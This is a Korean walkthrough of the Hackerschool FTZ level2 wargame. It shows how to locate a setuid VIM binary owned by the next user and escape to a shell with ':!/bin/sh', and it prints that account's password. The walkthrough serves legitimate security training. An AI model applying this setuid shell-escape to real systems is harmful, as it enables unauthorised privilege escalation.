Hackerschool FTZ level2

Category : System hacking

ssh://ftz.hackerschool.org id : level2 pw : hacker or cracker

Summary : Excute command in VIM


서버에 접속하여 디렉토리에있는 파일들을 확인하니 hint 라는 파일이 있다.

[level2@ftz level2]$ ls -l 합계 16 -rw-r--r--    1 root     root           60  3월 23  2000 hint drwxr-xr-x    2 root     level2       4096  2월 24  2002 public_html drwxrwxr-x    2 root     level2       8192  7월 10 05:52 tmp [level2@ftz level2]$ cat hint 텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...

아직까진 무엇을 의도한 힌트인지 모르므로 잠시 잊어두고 , level1에서 했던것과 같이 level3 user에 setuid가 걸린 파일을 찾는다.

[level2@ftz level2]$ find / -user level3 -perm -4000 2> /dev/null /usr/bin/editor [level2@ftz level2]$ ls -l /usr/bin/editor -rwsr-x---    1 level3   level2      22380  3월 29  2003 /usr/bin/editor

/usr/bin/editor 이란 level3 user의 실행파일에 setuid가 걸려있다.
실행이 가능하므로 우선 실행해본다.

[level2@ftz level2]$ editor ~ ~ ~ ~                                               VIM - Vi IMproved ~ ~                                                version 6.1.320 ~                                           by Bram Moolenaar et al. ~                                      Vim is open source and freely distributable ~ ~                                            Help poor children in Uganda! ~                                 type  :help iccf<Enter>       for information ~ ~                                 type  :q<Enter>               to exit ~                                 type  :help<Enter>  or  <F1>  for on-line help ~                                 type  :help version6<Enter>   for version info ~ ~ ~

VIM 에디터이다. 이제 다시 hint의 내용을 떠올려보면 , level3의 권한으로 setuid가 걸린 VIM 에디터에서 외부명령을 수행해 패스워드를 획득하는 것임을 생각할수있다.
VIM 의 외부명령어 기능을 이용하여 /bin/sh를 실행한다.

[level2@ftz level2]$ editor ~ ~ ~ ~                                              VIM - Vi IMproved ~ ~                                               version 6.1.320 ~                                           by Bram Moolenaar et al. ~                               Vim is open source and freely distributable ~ ~                                      Help poor children in Uganda! ~                          type  :help iccf<Enter>       for information ~ ~                          type  :q<Enter>               to exit ~                          type  :help<Enter>  or  <F1>  for on-line help ~                          type  :help version6<Enter>   for version info ~ ~ ~ :!/bin/sh [level3@ftz level2]$ id uid=3003(level3) gid=3002(level2) groups=3002(level2) [level3@ftz level2]$ my-pass Level3 Password is "can you fly?".

level3 user의 쉘을 획득하고 password를 얻었다.